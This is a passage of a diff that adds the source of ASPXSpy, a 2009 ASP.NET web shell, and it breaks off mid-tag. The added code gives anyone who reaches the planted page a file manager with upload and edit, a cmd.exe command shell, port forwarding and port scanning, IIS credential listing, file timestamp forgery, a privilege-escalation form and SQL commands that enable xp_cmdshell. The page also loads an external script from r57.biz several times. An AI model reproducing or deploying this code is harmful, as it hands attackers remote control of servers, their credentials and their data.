+catch (Exception ex) { }
+}
+protected void VTp(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+ltcpClient.EndConnect(ar);
+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
+}
+catch (Exception ex) { }
+}
+private void LFYM(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+int Ret=RKXy.rdel.EndReceive(ar);
+if (Ret>0)
+ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
+else lyTOK();
+}
+catch (Exception ex) { }
+}
+private void JTcp(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+RKXy.ldel.EndSend(ar);
+RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
+}
+catch (Exception ex) { }
+}
+private void xPS(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+int Ret=RKXy.ldel.EndReceive(ar);
+if (Ret>0)
+RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
+else lyTOK();
+}
+catch (Exception ex) { }
+}
+private void IZU(IAsyncResult ar)
+{
+try
+{
+session RKXy=(session)ar.AsyncState;
+RKXy.rdel.EndSend(ar);
+RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
+}
+catch (Exception ex) { }
+}
+public void lyTOK()
+{
+try
+{
+if (ltcpClient!=null)
+{
+ltcpClient.Close();
+}
+if (rtcpClient!=null)
+rtcpClient.Close();
+}
+catch (Exception ex) { }
+}
+}
+protected void vuou()
+{
+PortForward gYP=new PortForward();
+gYP.lyTOK();
+}
+protected void ruQO()
+{
+PortForward gYP=new PortForward();
+gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));
+}
+public string mRDl(string instr)
+{
+string tmp=null;
+try
+{
+tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();
+}
+catch(Exception e)
+{
+}
+return tmp;
+}
+public void VikG()
+{
+string[] OTV=lOmX.Text.ToString().Split(',');
+for(int i=0;i<OTV.Length;i++)
+{
+IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));
+}
+try
+{
+Thread[] kbXY=new Thread[IVc.Count];
+int sdO=0;
+for(sdO=0;sdO<IVc.Count;sdO++)
+{
+kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));
+kbXY[sdO].Start();
+}
+for(sdO=0;sdO<kbXY.Length;sdO++)
+kbXY[sdO].Join();
+}
+catch
+{
+}
+}
+public class ScanPort
+{
+private string _ip="";
+private int jTdO=0;
+private TimeSpan _timeSpent;
+private string QGcH="Not scanned";
+public string ip
+{
+get { return _ip;}
+}
+public int port
+{
+get { return jTdO;}
+}
+public string status
+{
+get { return QGcH;}
+}
+public TimeSpan timeSpent
+{
+get { return _timeSpent;}
+}
+public ScanPort(string ip,int port)
+{
+_ip=ip;
+jTdO=port;
+}
+public void Scan()
+{
+TcpClient iYap=new TcpClient();
+DateTime qYZT=DateTime.Now;
+try
+{
+iYap.Connect(_ip,jTdO);
+iYap.Close();
+QGcH="<font color=green><b>Open</b></font>";
+}
+catch
+{
+QGcH="<font color=red><b>Close</b></font>";
+}
+_timeSpent=DateTime.Now.Subtract(qYZT);
+}
+}
+public static void YFcNP(System.Web.UI.Page page)
+{
+page.RegisterHiddenField("__EVENTTARGET","");
+page.RegisterHiddenField("__FILE","");
+string s=@"<script language=Javascript>";
+s+=@"function Bin_PostBack(eventTarget,eventArgument)";
+s+=@"{";
+s+=@"var theform=document.forms[0];";
+s+=@"theform.__EVENTTARGET.value=eventTarget;";
+s+=@"theform.__FILE.value=eventArgument;";
+s+=@"theform.submit();";
+s+=@"} ";
+s+=@"</scr"+"ipt>";
+page.RegisterStartupScript("",s);
+}
+protected void PPtK(object sender,EventArgs e)
+{
+WICxe();
+yhv.Visible=true;
+Bin_H2_Title.InnerText="File Search >>";
+NaLJ.Value=Request.PhysicalApplicationPath;
+oJiym.Visible=false;
+}
+protected void NBy(object sender,EventArgs e)
+{
+DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);
+if(!GQMM.Exists)
+{
+xseuB("Path invalid ! ");
+return;
+}
+oog(GQMM);
+xseuB("Search completed ! ");
+}
+public void oog(DirectoryInfo dir)
+{
+try
+{
+oJiym.Visible=true;
+foreach(FileInfo Bin_Files in dir.GetFiles())
+{
+try
+{
+if(Bin_Files.FullName==Request.PhysicalPath)
+{
+continue;
+}
+if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))
+{
+continue;
+}
+if(Ven.SelectedItem.Value=="name")
+{
+if(rAQ.Checked)
+{
+if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
+{
+FJvQ(Bin_Files);
+}
+}
+else
+{
+if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
+{
+Response.Write(Bin_Files.FullName);
+FJvQ(Bin_Files);
+}
+}
+}
+else
+{
+StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
+string ava=sr.ReadToEnd();
+sr.Close();
+if(rAQ.Checked)
+{
+if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
+{
+FJvQ(Bin_Files);
+if(YZw.Checked)
+{
+ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
+sw.Write(ava);
+sw.Close();
+}
+}
+}
+else
+{
+if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
+{
+FJvQ(Bin_Files);
+if(YZw.Checked)
+{
+ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
+StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
+sw.Write(ava);
+sw.Close();
+}
+}
+}
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+continue;
+}
+}
+foreach(DirectoryInfo subdir in dir.GetDirectories())
+{
+oog(subdir);
+}
+}
+catch(Exception ex)
+{
+xseuB(ex.Message);
+}
+}
+public void FJvQ(FileInfo objfile)
+{
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+string bg=OKM();
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Text=objfile.LastWriteTime.ToString();
+tr.Cells.Add(tc);
+tc=new TableCell();
+tc.Text=mTG(objfile.Length);
+tr.Cells.Add(tc);
+oJiym.Rows.Add(tr);
+}
+public void xseuB(string instr)
+{
+jDKt.Visible=true;
+jDKt.InnerText=instr;
+}
+protected void xVm(object sender,EventArgs e)
+{
+string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
+if(Jfm==Password)
+{
+Response.Cookies.Add(new HttpCookie(vbhLn,Password));
+ljtzC.Visible=false;
+PBZw();
+}
+else
+{
+tZSx();
+}
+}
+protected void Ybg(object sender,EventArgs e)
+{
+krIR(Server.MapPath("."));
+}
+protected void KjPi(object sender,EventArgs e)
+{
+Bin_H2_Title.InnerText="IIS Spy >>";
+WICxe();
+VNR.Visible=true;
+AdCx();
+}
+protected void DGCoW(object sender,EventArgs e)
+{
+try
+{
+StreamWriter sw;
+if(NdCX.SelectedItem.Text=="UTF-8")
+{
+sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
+}
+else
+{
+sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
+}
+sw.Write(Xgvv.InnerText);
+sw.Close();
+xseuB("Save file success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void lbjLD(object sender,EventArgs e)
+{
+string FlwA=AXSbb.Value;
+FlwA=OElM(FlwA);
+try
+{
+Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
+xseuB("File upload success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void EXV(object sender,EventArgs e)
+{
+krIR(AXSbb.Value);
+}
+protected void mcCY(object sender,EventArgs e)
+{
+krIR(Server.MapPath("."));
+}
+protected void iVk(object sender,CommandEventArgs e)
+{
+krIR(e.CommandArgument.ToString());
+}
+protected void XXrLw(object sender,EventArgs e)
+{
+try
+{
+File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
+File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
+File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
+xseuB("File time clone success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void tIykC(object sender,EventArgs e)
+{
+string path=pWVL.Value;
+try
+{
+File.SetAttributes(path,FileAttributes.Normal);
+if(ZhWSK.Checked)
+{
+File.SetAttributes(path,FileAttributes.ReadOnly);
+}
+if(SsR.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
+}
+if(ccB.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
+}
+if(fbyZ.Checked)
+{
+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
+}
+File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
+File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
+File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
+xseuB("File attributes modify success!");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+protected void VOxn(object sender,EventArgs e)
+{
+WICxe();
+vIac.Visible=true;
+Bin_H2_Title.InnerText="Execute Command >>";
+}
+protected void FbhN(object sender,EventArgs e)
+{
+try
+{
+Process ahAE=new Process();
+ahAE.StartInfo.FileName=kusi.Value;
+ahAE.StartInfo.Arguments=bkcm.Value;
+ahAE.StartInfo.UseShellExecute=false;
+ahAE.StartInfo.RedirectStandardInput=true;
+ahAE.StartInfo.RedirectStandardOutput=true;
+ahAE.StartInfo.RedirectStandardError=true;
+ahAE.Start();
+string Uoc=ahAE.StandardOutput.ReadToEnd();
+Uoc=Uoc.Replace("<","&lt;");
+Uoc=Uoc.Replace(">","&gt;");
+Uoc=Uoc.Replace("\r\n","<br>");
+tnQRF.Visible=true;
+tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+protected void RAFL(object sender,EventArgs e)
+{
+if(qPdI.Text.Length>0)
+{
+tpRQ(qPdI.Text);
+}
+else
+{
+lFAvw();
+}
+}
+protected void Grxk(object sender,EventArgs e)
+{
+YUw();
+}
+protected void ilC(object sender,EventArgs e)
+{
+tZRH();
+}
+protected void HtB(object sender,EventArgs e)
+{
+pDVM();
+}
+protected void Olm(object sender,EventArgs e)
+{
+iLVUT();
+}
+protected void jXhS(object sender,EventArgs e)
+{
+ADCpk();
+}
+protected void lRfRj(object sender,EventArgs e)
+{
+lDODR();
+}
+protected void xSy(object sender,EventArgs e)
+{
+xFhz();
+}
+protected void dMx(object sender,EventArgs e)
+{
+rAhe();
+}
+protected void zOVO(object sender,EventArgs e)
+{
+if(((DropDownList)sender).ID.ToString()=="WYmo")
+{
+dQIIF.Visible=false;
+MasR.Text=WYmo.SelectedItem.Value.ToString();
+}
+if(((DropDownList)sender).ID.ToString()=="Pvf")
+{
+xTZY();
+}
+if(((DropDownList)sender).ID.ToString()=="FGEy")
+{
+jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
+}
+if(((DropDownList)sender).ID.ToString()=="NdCX")
+{
+gLKc(Sqon.Value);
+}
+}
+protected void IkkO(object sender,EventArgs e)
+{
+krIR(AXSbb.Value);
+}
+protected void BGY(object sender,EventArgs e)
+{
+vCf();
+}
+protected void cptS(object sender,EventArgs e)
+{
+vNCHZ();
+}
+protected void fDO(object sender,EventArgs e)
+{
+MHLv();
+}
+protected void vJNsE(object sender,EventArgs e)
+{
+vuou();
+xseuB("Clear All Thread ......");
+}
+protected void wDZ(object sender,EventArgs e)
+{
+if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
+ruQO();
+xseuB("All Thread Start ......");
+}
+protected void tYoZ(object sender,EventArgs e)
+{
+}
+protected void ELkQ(object sender,EventArgs e)
+{
+VikG();
+GBYT.Visible=true;
+string res=string.Empty;
+foreach(ScanPort th in IVc)
+{
+res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
+}
+GBYT.InnerHtml=res;
+}
+protected void ORUgV(object sender,EventArgs e)
+{
+dwgT();
+}
+public void WICxe()
+{
+DCbS.Visible=false;
+CzfO.Visible=false;
+APl.Visible=false;
+vIac.Visible=false;
+kkHN.Visible=false;
+YwLB.Visible=false;
+iDgmL.Visible=false;
+hOWTm.Visible=false;
+vrFA.Visible=false;
+yhv.Visible=false;
+}
+</script>
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<head id="Head1" runat="server">
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
+<title>ASPXspy</title>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<style type="text/css">
+.Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
+.list{font:12px Arial,Tahoma;height:23px;}
+.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+.u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form){
+for(var i=0;i<form.elements.length;i++){
+var e=form.elements[i];
+if(e.name!='chkall')
+e.checked=form.chkall.checked;
+}
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed;">
+<form id="ASPXSpy" runat="server">
+<div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
+<span style="font:11px Verdana;">Password:</span>
+<asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
+<asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
+Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
+</div>
+<div id="ZVS" runat="server">
+<div id="Zzj" runat="server">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+<tr class="head">
+<td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
+</tr>
+<tr class="alt1">
+<td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
+<asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
+</td>
+</tr>
+</table>
+</div>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
+<h2 id="Bin_H2_Title" runat="server"></h2>
+<%--FileList--%>
+<div id="CzfO" runat="server">
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+ <tr>
+<td style=" white-space:nowrap">Current Directory : </td>
+<td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
+</td>
+<td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
+ </tr>
+</table>
+<table width="100%" border="0" cellpadding="4" cellspacing="0">
+<tr class="alt1"><td colspan="7" style="padding:5px;">
+<div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
+<asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
+ | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
+</td></tr>
+<asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--FileEdit--%>
+<div id="vrFA" runat="server">
+<p>Current File(import new file name and new file)<br/>
+<input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
+</p>
+<p>File Content<br/>
+<textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
+</p>
+<p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
+</div>
+<%--CloneTime--%>
+<div id="zRyG" runat="server" enableviewstate="false" visible="false">
+<p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
+<p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
+<p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
+<h2>Set last modified &raquo;</h2>
+<p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
+<p>
+<asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
+&nbsp;
+<asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
+</p>
+<p>
+CreationTime :
+<input class="input" id="yUqx" type="text" runat="server"/>
+LastWriteTime :
+<input class="input" id="uYjw" type="text" runat="server"/>
+LastAccessTime :
+<input class="input" id="aLsn" type="text" runat="server"/>
+</p>
+<p>
+<asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
+</p>
+</div>
+<%--IISSpy--%>
+<div runat="server" id="VNR" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
+<asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--Process--%>
+<div runat="server" id="DCbS" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--CmdShell--%>
+<div runat="server" id="vIac">
+ <p>CmdPath:<br/>
+ <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
+ </p>
+ Argument:<br/>
+ <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
+ <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
+ </div>
+</div>
+<%--Services--%>
+<div runat="server" id="iQxm" visible ="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--Sysinfo--%>
+<div runat="server" id="ghaB" visible="false" enableviewstate="false">
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
+<h2 id="Bin_H2_Mac" runat="server"></h2>
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
+<h2 id="Bin_H2_Driver" runat="server"></h2>
+<hr style=" border: 1px solid #ddd;height:0px;"/>
+<ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
+</div>
+<%--UserInfo--%>
+<div runat="server" id="xWVQ" visible="false" enableviewstate="false">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
+</asp:Table>
+</table>
+</div>
+<%--SuExp--%>
+ <div runat="server" id="APl">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+ <tr align="center">
+ <td style="width:10%"></td>
+ <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
+ <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
+ <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
+ <td style="width:10%"></td>
+ </tr>
+ <tr >
+ <td style="width:10%"></td>
+ <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
+ </tr>
+</table>
+<div id="UHlA" visible="false" enableviewstate="false" runat="server">
+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
+<tr align="center">
+<td style="width:30%"></td>
+<td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
+<td style="width:30%"></td>
+</tr>
+</table>
+</div>
+</div>
+<%--Reg--%>
+<div id="kkHN" runat="server">
+<p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+<asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
+<asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
+<asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
+</asp:Table>
+</table>
+</div>
+<%--PortScan--%>
+<div id="YwLB" runat="server">
+<p>
+IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
+</p>
+<div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
+</div>
+<%--DataBase--%>
+<div id="iDgmL" runat="server">
+<p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
+<div id="dQIIF" runat="server">
+<div id="irTU" runat="server"></div>
+<div id="uXevN" runat="server">
+Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
+SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem 